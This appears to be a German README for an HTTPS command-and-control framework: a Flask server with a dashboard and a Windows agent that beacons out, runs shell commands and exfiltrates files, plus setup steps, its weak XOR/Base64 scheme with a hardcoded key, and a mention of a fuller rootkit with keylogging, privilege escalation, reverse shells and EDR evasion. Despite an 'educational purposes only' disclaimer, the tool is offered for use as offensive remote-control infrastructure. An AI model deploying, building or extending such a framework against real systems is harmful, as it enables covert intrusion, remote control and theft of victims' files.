
HTTPS C&C Framework mit verschlüsselten Beacons, einem Web-Dashboard und einem Windows-Agent.

HTTPS Command & Control-Infrastruktur mit Web-Dashboard zur Fernsteuerung von Windows-Agents.
⚠️ Nur zu Bildungszwecken – Missbrauch liegt in Ihrer Verantwortung.
Server:
cd server
pip install flask
python c2_server.py
Dashboard aufrufen: https://localhost:8443
Client:
build.bat
Bearbeiten Sie client/c2_client.cpp, um Ihre Server-IP festzulegen:
wstring c2ServerUrl = L"https://YOUR_SERVER_IP:8443";
Verschlüsselung: XOR + Base64
Schlüssel: Hostname + Username + "SecretKey2025"
Transport: HTTPS (Port 8443)
Agent → POST /api/checkin → Server (Befehle abrufen)
Agent → POST /api/result → Server (Ergebnisse senden)
Server: Python 3.9+, Flask
Client: MinGW-w64 GCC 15.2+, Windows SDK, C++17
Dieses C2-Framework stammt aus dem XvX Usermode Rootkit-Projekt. Die vollständige Rootkit-Version enthält ein umfassenderes C2 mit über 15 Befehlen, darunter Prozess-/Datei-/Registry-Verstecken, SYSTEM-Rechteausweitung, interaktive Reverse-Shells, Keylogger-Funktionalität, DLL-Injection und EDR-Umgehungstechniken. Diese eigenständige Version bietet die zentrale C2-Infrastruktur für Bildungszwecke und die einfache Integration in eigene Projekte.
Autor: 28zaakypro[@]proton[.]me
| Befehl | Syntax | Beschreibung |
|---|
shell | shell <cmd> | Shell-Befehl ausführen |
exfil | exfil <pfad> | Datei exfiltrieren (Base64) |
sleep | sleep <sekunden> | Beacon-Intervall ändern |
ping | ping | Konnektivität testen |
die | die | Agent beenden |